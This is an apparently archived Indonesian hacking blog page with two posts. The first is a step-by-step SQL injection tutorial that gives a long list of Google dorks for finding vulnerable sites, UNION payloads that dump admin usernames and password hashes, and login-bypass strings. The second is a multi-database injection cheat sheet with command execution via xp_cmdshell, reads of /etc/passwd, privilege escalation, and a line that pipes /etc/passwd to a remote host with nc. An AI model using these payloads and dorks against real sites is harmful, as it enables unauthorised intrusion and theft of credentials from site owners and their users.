Demo Blog
Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan
Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan

Belajar SQL Injection dasar

by d0ntcry on Nov.22, 2009, under

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
.::BELAJAR SQL INJECTION DASAR::.

Author : d0ntcry
Blog : http://d0nt-cry.blogspot.com
3.50 16 FEB 2010
FEAT. GOLIATH-MD2 and 234

Thankz : kamtiez-tukulesto-arianom-cimpli-pathloader
mbamboenk.owos.and you..
all member....
indonesiancoderTeam | kill-9 crew | SCTeam
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Assalamualaikum wr wb

Kita mulai langsung aja... kalo sudah mengerti jangan lupa lebih mendalami lagi tentang sql.. okey..
untuk mencari web vulner ato tidak
1. "-" [single mark] --> http://target.com/news.php?id=1- (id=-)
2. "'" [single quote] --> http://target.com/news.php?id=1' atao http://target.com/news.php?id='1 (id=null'/id='null)
3. "and 1=2" --> http://target.com/news.php?id=1 and 1=2 (can you see??)*
3. !sql scan dgn bug+dork yang sudah ada... :D
4. jalan-jalan di web tersebut and be creative.. ^^

*kenapa koq tanda seperti itu ya?wah..dapet dari google se katana itu 1=2 melihatkan kalo id tersebut nilainya ERROR,contoh:
1. news.php?id=1 and 1=2 <-- nilainya salah.lah piye?ra ketok ta matane siji iku yo siji.. mosok siji iku loro rek.. wkwkwk... dan efeknya artikel web menghilang.. sakti jeh!! ato menunjukan syntax error :D
2. news.php?id=1 and 1=1 <-- nilainya benar.artikel web kembali.no page error...

Pada akhir perintah selanjutnya gunakan tanda "/*" ato "--" ato "#" menandakan akhir perintah...

OK.. lets duit..

cari kata kuncinya dulu (dork).contoh :
[SPOILER]
inurl:"shredder-categories.php?id="
inurl:"tradeCategory.php?id="
inurl:"product_ranges_view.php?ID="
inurl:"shop_category.php?id="
inurl:"product_list.php?id="
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
[/SPOILER]

waaahh.. banyak bgt!! :D
lebih gampangnya join di irc cari channel yang ada bot scan sqlnya..
jalankan botnya --> !sql d0ntcrymanis.php?idku= indonesiancoderteam (!sql )
scriptnya bisa tnya ane di irc...

sampe mana ya tadi... hehehehe...
oia.. da dapet webnya yg vuln.. misal :

1. http://target.com/product_list.php?id=1' <- (You have an error in your SQL syntax....)
- kalo gak error lakukan percobaan2 lagi dengan menambahkan.. menghilangkan.. atao apalah pokknya error.. kalo gak error ya cari target lagi.. ^^ "gak ada keamanan web yg 100% aman" <-- gak berani ngomong kaya gitu.. belum jadi 31337 :D

2. mencari nomer togel... dengan memeriksa kolom
- syntax : order+by+1..dst --> (untuk mencari nomer akhir) pengecekan dimulai dari 1 s/d kondisi halaman mendapatkan kondisi false/error page.

Akhirnya kondisi false diketahui pada kolom 5 :
:: http://target.com/product_list.php?id=1 order by 1,2,3,4,5--
(Unknown column '5' in 'order clause', Sorry, no products in this category) / bisa juga pesannya beda...

atau bisa juga :
.:. http://target.com/product_list.php?id=1 order by 1-- [gak ada error]
http://target.com/product_list.php?id=1 order by 2-- [gak ada error]
http://target.com/product_list.php?id=1 order by 3-- [gak ada error]
http://target.com/product_list.php?id=1 order by 4-- [gak ada error]
http://target.com/product_list.php?id=1 order by 5-- [error ne]

---> Itu tandanya kolom yang ada diweb tsb ada 4 kolom

3. Jika sudah ktemu.. cari nomer togelnya...
- syntax : union+select

:: http://target.com/product_list.php?id=1 union select 1,2,3,4--
:: http://target.com/product_list.php?id=1 union all select 1,2,3,4--
kliatan gak nomer togelnya?? misal aja ya.. nomer yang kliatan 2 <-- nomer togel (asumsi aja)
kalo gak kliatan ya pasang aja version() disetiap nomer atu2 :D

4. mencari informasi MySQL
syntax :
- version mysql : version() atau @@version
- mengetahui jenis database : database()
- mengetahui user : user()
- lebih mudahnya, menggunakan perintah "concat()" untuk melihat semua informasi yang kita butuhkan di dalam satu tempat

:: http://target.com/product_list.php?id=1 union select 1,version(),3,4--

atau

:: http://target.com/product_list.php?id=1 union select 1,concat (version(),0x3a,user(),0x3a,database()),3,4--

taraaa....MYSQL versi 5.0.45 ( kita asumsikan aja kaya gitu..hehehe )

Untuk MySQL versi 5, kita bisa lanjutkan ke pemeriksaan tabel dan kolom.Tapi untuk versi 4, kita harus mencari dan menebak database(blind sqli),yg nama tabel dan kolom yang ditempatkan tidak beraturan.

nb : 0x3a adalah tanda ":" yang sudah dirubah mnjdi karakter hexadecimal (untuk memisahkan informasi yang kita inginkan)

5. Memeriksa tabel
Syntax : 'union+select' ; "group_concat(table_name)" ; "from+information_schema.tables+where+table_schema=database()--"
Artinya : kita akan mengeluarkan keseluruhan tabel menggunakan information schema dimana table yang di-schema adalah
dari fungsi query database().
Dapat diartikan bahwa database() adalah perintah yang digunakan untuk melihat nama database

:: id=1 union select 1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
Mencari tabel (limit) :
:: id=-1+union+select+1,table_name,3,4+from+information_schema.tables+limit+8,1--

6. Melihat Isi Kolom Dari Tabel
Untuk mengeluarkan column name, syntax-nya sama dengan mengeluarkan table name, hanya saja "table" kita ganti dengan
"column".

Syntax :
"union+select" ; "group_concat(column_name)" ; "from+information_schema.columns+where+table_name=nama_table_target--"

Artinya : kita akan mengeluarkan keseluruhan column menggunakan information schema dimana table name-nya = table yang
jadi tujuan

Contoh dalam tabel ada kolom "admin"
:: id=-1+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646D696E--
convert "admin" to hex -> 61646D696E


7. Melihat data dari kolom
perintah : 'group_concat(mbohkah,cuk,raimu,asu)'
misal tadi kolom yang keluar dari admin : user,id,password,kentu,nangdi,matamu,suwek

:: id=-1+union+select+1,group_concat(user,0x3,password),3,4+from+admin--

jreng..jreng... dapet dah...
d0ntcrymanis:0e311e5b9704f28b4e8557e8fa3fbe7d

pass crack dulu :)

macam2 hash banyak loh!!jadi harus belajar lagi.. gak cuma md5 aja.. ^^

.: Kemungkinan2 variable utk masuk kedalam login page tanpa password dan user name :D :.

1'or'1'='1

0'or'0'='0

admin'--

admin' #

admin'/*

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

password:' or 1=1--

or 1=1--

'or'a'='a

"or"a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi') or ('a'='a

hi") or ("a"="a

'or'1'='1' and firstname <>'d0ntcry <-- nama member

'or'1'='1' and firstname <>'d0ntcry' and firstname <>'dnock


/===========.tambahan.===========\

*) ada juga dengan teknik having 1=1 SQL Injection di MS-SQL Server (google please...)
*) schemafuzz : sqli instant.hihihihi... :p
schemafuzz.py -h <-- melihat perintah2nya
[+] --dbs [untuk mengetahui nama database sql]
[+] --schema [untuk melihat nama tabel n nama column]
[+] --dump [untuk melihat isi dari column]
contoh : (liat target atas) nomer togel diganti dengan "darkc0de"
1. c:/>schemafuzz.py --dbs -u "http://target.com/product_list.php?id=1 union select 1,darkc0de,3,4--
2. c:/>schemafuzz.py --schema -u "http://target.com/product_list.php?id=1 union select 1,darkc0de,3,4--" -D
3. c:/>schemafuzz.py --dump -u "http://target.com/product_list.php?id=1 union select 1,darkc0de,3,4--" -T -C -D
*) tools2 sqli yang bisa didapatkan di forum2 security...



sabaiknya coba cara manual dulu sebelum pake tools/python...
Matur nuwun.. kalo ada kekurangan mohon dimaafkan coz bisanya cuma maen2 kaya gini aja gak bisa nangkalnya.. urung dong bgt sqlan.. tapi berkat temen2 yang mau share pasti aq bisa..hohohohoho...^^


salam hangat,


d0ntcry,
waalaikum salam wr.wb

Source : Klik
----.end.of.fles.----
3 komentar more...

SQL Cheat Sheet

by d0ntcry on Nov.22, 2009, under


MSSQL


VersionSELECT @@version
CommentsSELECT 1 — comment

SELECT /*comment*/1

Current UserSELECT user_name();

SELECT system_user;


SELECT user;


SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

List UsersSELECT name FROM master..syslogins
List Password HashesSELECT name, password FROM master..sysxlogins — priv, mssql 2000;

SELECT
name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins —
priv, mssql 2000. Need to convert to hex to return hashes in MSSQL
error message / some version of query analyzer.


SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;


SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005

Password CrackerMSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.
List PrivilegesImpossible?
List DBA AccountsTODO

SELECT
is_srvrolemember(’sysadmin’); — is your account a sysadmin? returns 1
for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’,
’systemadmin’ and other values from the documentation


SELECT is_srvrolemember(’sysadmin’, ’sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.

Current DatabaseSELECT DB_NAME()
List DatabasesSELECT name FROM master..sysdatabases;

SELECT DB_NAME(N); — for N = 0, 1, 2, …

List ColumnsSELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only

SELECT
master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
master..sometable

List TablesSELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views

SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;


SELECT
master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
master..sometable

Find Tables From Column Name
NB: This example works only for the current database. If you wan’t to
search another db, you need to specify the db name (e.g. replace
sysobject with mydb..sysobjects).

SELECT sysobjects.name
as tablename, syscolumns.name as columnname FROM sysobjects JOIN
syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype =
‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column
for each column containing the word ‘password’

Select Nth RowSELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row
Select Nth CharSELECT substring(‘abcd’, 3, 1) — returns c
Bitwise ANDSELECT 6 & 2 — returns 2

SELECT 6 & 1 — returns 0

ASCII Value -> CharSELECT char(0×41) — returns A
Char -> ASCII ValueSELECT ascii(‘A’) – returns 65
CastingSELECT CAST(‘1′ as int);

SELECT CAST(1 as char)

String ConcatenationSELECT ‘A’ + ‘B’ – returns AB
If StatementIF (1=1) SELECT 1 ELSE SELECT 2 — returns 1
Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1
Avoiding QuotesSELECT char(65)+char(66) — returns AB
Time DelayWAITFOR DELAY ‘0:0:5′ — pause for 5 seconds
Make DNS Requestsdeclare
@host varchar(800); select @host = name FROM master..syslogins;
exec(‘master..xp_getfiledetails ”\\’ + @host + ‘\c$\boot.ini”’); —
nonpriv, works on 2000

declare @host varchar(800); select
@host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) +
‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\\’ +
@host + ‘\c$\boot.ini”’); — priv, works on 2005


– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.


– Also check out theDNS tunnel feature of sqlninja

Command ExecutionEXEC xp_cmdshell ‘net user’; — priv



On MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:


EXEC sp_configure ’show advanced options’, 1; — priv


RECONFIGURE; — priv


EXEC sp_configure ‘xp_cmdshell’, 1; — priv


RECONFIGURE; — priv

Local File AccessCREATE TABLE mydata (line varchar(8000));

BULK INSERT mydata FROM ‘c:\boot.ini’;


DROP TABLE mydata;

Hostname, IP AddressSELECT HOST_NAME()
Create UsersEXEC sp_addlogin ‘user’, ‘pass’; — priv
Drop UsersEXEC sp_droplogin ‘user’; — priv
Make User DBAEXEC master.dbo.sp_addsrvrolemember ‘user’, ’sysadmin; — priv
Location of DB filesTODO
Default/System Databasesnorthwind

model


msdb


pubs


tempdb


Oracle


VersionSELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;

SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;


SELECT version FROM v$instance;

CommentsSELECT 1 FROM dual — comment


NB: SELECT statements must have a FROM clause in Oracle so we have to
use the dummy table name ‘dual’ when we’re not actually selecting from
a table.

Current UserSELECT user FROM dual
List UsersSELECT username FROM all_users ORDER BY username;

SELECT name FROM sys.user$; — priv

List Password HashesSELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked

SELECT name,spare4 FROM sys.user$ — priv, 11g

Password Crackercheckpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List PrivilegesSELECT * FROM session_privs; — current privs

SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs


SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv


SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

List DBA AccountsSELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
Current DatabaseSELECT global_name FROM global_name;



SELECT name FROM v$database;


SELECT instance_name FROM v$instance;


SELECT SYS.DATABASE_NAME FROM DUAL;

List DatabasesSELECT DISTINCT owner FROM all_tables; — list schemas (one per user)

– Also query TNS listener for other databases. See tnscmd (services | status).

List ColumnsSELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;

SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;

List TablesSELECT table_name FROM all_tables;

SELECT owner, table_name FROM all_tables;

Find Tables From Column NameSELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
Select Nth RowSELECT
username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY
username) WHERE r=9; — gets 9th row (rows numbered from 1)
Select Nth CharSELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
Bitwise ANDSELECT bitand(6,2) FROM dual; — returns 2

SELECT bitand(6,1) FROM dual; — returns0

ASCII Value -> CharSELECT chr(65) FROM dual; — returns A
Char -> ASCII ValueSELECT ascii(‘A’) FROM dual; — returns 65
CastingSELECT CAST(1 AS char) FROM dual;


SELECT CAST(‘1′ AS int) FROM dual;

String ConcatenationSELECT ‘A’ || ‘B’ FROM dual; — returns AB
If StatementBEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1



SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2

Avoiding QuotesSELECT chr(65) || chr(66) FROM dual; — returns AB
Time DelayBEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT



SELECT UTL_INADDR.get_host_name(‘10.0.0.1′) FROM dual; — if reverse looks are slow


SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow


SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow



– Also see Heavy Queries to create a time delay

Make DNS RequestsSELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;


SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;

Command ExecutionJava can be used to execute commands if it’s installed.


ExtProc can sometimes be used too, though it normally failed for me. :-(

Local File AccessUTL_FILE can sometimes be used. Check that the following is non-null:


SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;


Java can be used to read and write files if it’s installed (it is not available in Oracle Express).

Hostname, IP AddressSELECT UTL_INADDR.get_host_name FROM dual;


SELECT host_name FROM v$instance;


SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address


SELECT UTL_INADDR.get_host_name(‘10.0.0.1′) FROM dual; — gets hostnames

Location of DB filesSELECT name FROM V$DATAFILE;
Default/System DatabasesSYSTEM


SYSAUX


MySQL


VersionSELECT @@version
CommentsSELECT 1; #comment


SELECT /*comment*/1;

Current UserSELECT user();


SELECT system_user();

List UsersSELECT user FROM mysql.user; — priv
List Password HashesSELECT host, user, password FROM mysql.user; — priv
Password CrackerJohn the Ripper will crack MySQL password hashes.
List PrivilegesSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs


SELECT
host, user, Select_priv, Insert_priv, Update_priv, Delete_priv,
Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,
File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,
Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,
Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; —
priv, list user privs



SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)


SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns

List DBA AccountsSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;


SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv

Current DatabaseSELECT database()
List DatabasesSELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0


SELECT distinct(db) FROM mysql.db — priv

List ColumnsSELECT
table_schema, table_name, column_name FROM information_schema.columns
WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List TablesSELECT
table_schema,table_name FROM information_schema.tables WHERE
table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column NameSELECT
table_schema, table_name FROM information_schema.columns WHERE
column_name = ‘username’; — find table which have a column called
‘username’
Select Nth RowSELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0



SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth CharSELECT substr(‘abcd’, 3, 1); # returns c
Bitwise ANDSELECT 6 & 2; # returns 2



SELECT 6 & 1; # returns 0

ASCII Value -> CharSELECT char(65); # returns A
Char -> ASCII ValueSELECT ascii(‘A’); # returns 65
CastingSELECT cast(‘1′ AS unsigned integer);


SELECT cast(‘123′ AS char);

String ConcatenationSELECT CONCAT(‘A’,'B’); #returns AB


SELECT CONCAT(‘A’,'B’,'C’); # returns ABC

If StatementSELECT if(1=1,’foo’,'bar’); — returns ‘foo’
Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding QuotesSELECT 0×414243; # returns ABC
Time DelaySELECT BENCHMARK(1000000,MD5(‘A’));


SELECT SLEEP(5); # >= 5.0.12

Make DNS RequestsImpossible?
Command ExecutionIf
mysqld (<5.0) is running as root AND you compromise a DBA account
you can execute OS commands by uploading a shared object file into
/usr/lib (or similar). The .so file should contain a User Defined
Function (UDF). raptor_udf.c
explains exactly how you go about this. Remember to compile for the
target architecture which may or may not be the same as your attack
platform.
Local File Access…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.


SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system

Hostname, IP AddressImpossible?
Create UsersCREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Delete UsersDROP USER test1; — priv
Make User DBAGRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv
Location of DB filesSELECT @@datadir;
Default/System Databasesinformation_schema (>= mysql 5.0)


mysql


Postgres


VersionSELECT version()
CommentsSELECT 1; –comment

SELECT /*comment*/1;

Current UserSELECT user;


SELECT current_user;


SELECT session_user;


SELECT usename FROM pg_user;


SELECT getpgusername();

List UsersSELECT usename FROM pg_user
List Password HashesSELECT usename, passwd FROM pg_shadow — priv
Password CrackerMDCrack can crack PostgreSQL’s MD5-based passwords.
List PrivilegesSELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
List DBA AccountsSELECT usename FROM pg_user WHERE usesuper IS TRUE
Current DatabaseSELECT current_database()
List DatabasesSELECT datname FROM pg_database
List ColumnsSELECT
relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE ‘public’)
List TablesSELECT
c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace
n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname
NOT IN (‘pg_catalog’, ‘pg_toast’) AND
pg_catalog.pg_table_is_visible(c.oid)
Find Tables From Column NameIf you want to list all the table names that contain a column LIKE ‘%password%’:



SELECT
DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE
‘%password%’;

Select Nth RowSELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0


SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

Select Nth CharSELECT substr(‘abcd’, 3, 1); — returns c
Bitwise ANDSELECT 6 & 2; — returns 2



SELECT 6 & 1; –returns 0

ASCII Value -> CharSELECT chr(65);
Char -> ASCII ValueSELECT ascii(‘A’);
CastingSELECT CAST(1 as varchar);


SELECT CAST(‘1′ as int);

String ConcatenationSELECT ‘A’ || ‘B’; — returnsAB
If StatementIF statements only seem valid inside functions, so aren’t much use for SQL injection. See CASE statement instead.
Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
Avoiding QuotesSELECT CHR(65)||CHR(66); — returns AB
Time DelaySELECT pg_sleep(10); — postgres 8.2+ only


CREATE
OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ’sleep’
language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep
function. Taken from here .

Make DNS RequestsGenerally not possible in postgres. However if contrib/dblink is installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights):


SELECT * FROM dblink(‘host=put.your.hostname.here user=someuser dbname=somedb’, ‘SELECT version()’) RETURNS (result TEXT);


Alternatively,
if you have DBA rights you could run an OS-level command (see below) to
resolve hostnames, e.g. “ping pentestmonkey.net”.

Command ExecutionCREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ’system’ LANGUAGE ‘C’ STRICT; — priv


SELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080′); — priv, commands run as postgres/pgsql OS-level user

Local File AccessCREATE TABLE mydata(t text);


COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user


…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time



…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time …


DROP TABLE mytest mytest;


Write to a file:


CREATE TABLE mytable (mycol text);


INSERT INTO mytable(mycol) VALUES (”);


COPY
mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres
OS-level user. Generally you won’t be able to write to the web root,
but it’s always work a try.



– priv user can also read/write files by mapping libc functions

Hostname, IP AddressSELECT inet_server_addr(); — returns db server IP address (or null if using local connection)


SELECT inet_server_port(); — returns db server IP address (or null if using local connection)

Create UsersCREATE USER test1 PASSWORD ‘pass1′; — priv


CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time

Drop UsersDROP USER test1; — priv
Make User DBAALTER USER test1 CREATEUSER CREATEDB; — priv
Location of DB filesSELECT current_setting(‘data_directory’); — priv


SELECT current_setting(‘hba_file’); — priv

Default/System Databasestemplate0


template1


Ingres


Versionselect dbmsinfo(‘_version’);
CommentsSELECT 123; — comment


select 123; /* comment */

Current Userselect dbmsinfo(’session_user’);



select dbmsinfo(’system_user’);

List UsersFirst connect to iidbdb, then:


select name, password from iiuser;

Create Userscreate user testuser with password = ‘testuser’;– priv
List Password HashesFirst connect to iidbdb, then:


select name, password from iiuser;

List Privilegesselect dbmsinfo(‘db_admin’);


select dbmsinfo(‘create_table’);



select dbmsinfo(‘create_procedure’);


select dbmsinfo(’security_priv’);


select dbmsinfo(’select_syscat’);


select dbmsinfo(‘db_privileges’);


select dbmsinfo(‘current_priv_mask’);

List DBA AccountsTODO
Current Databaseselect dbmsinfo(‘database’);
List DatabasesTODO
List Columnsselect column_name, column_datatype, table_name, table_owner from iicolumns;
List Tablesselect table_name, table_owner from iitables;


select relid, relowner, relloc from iirelation;


select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;
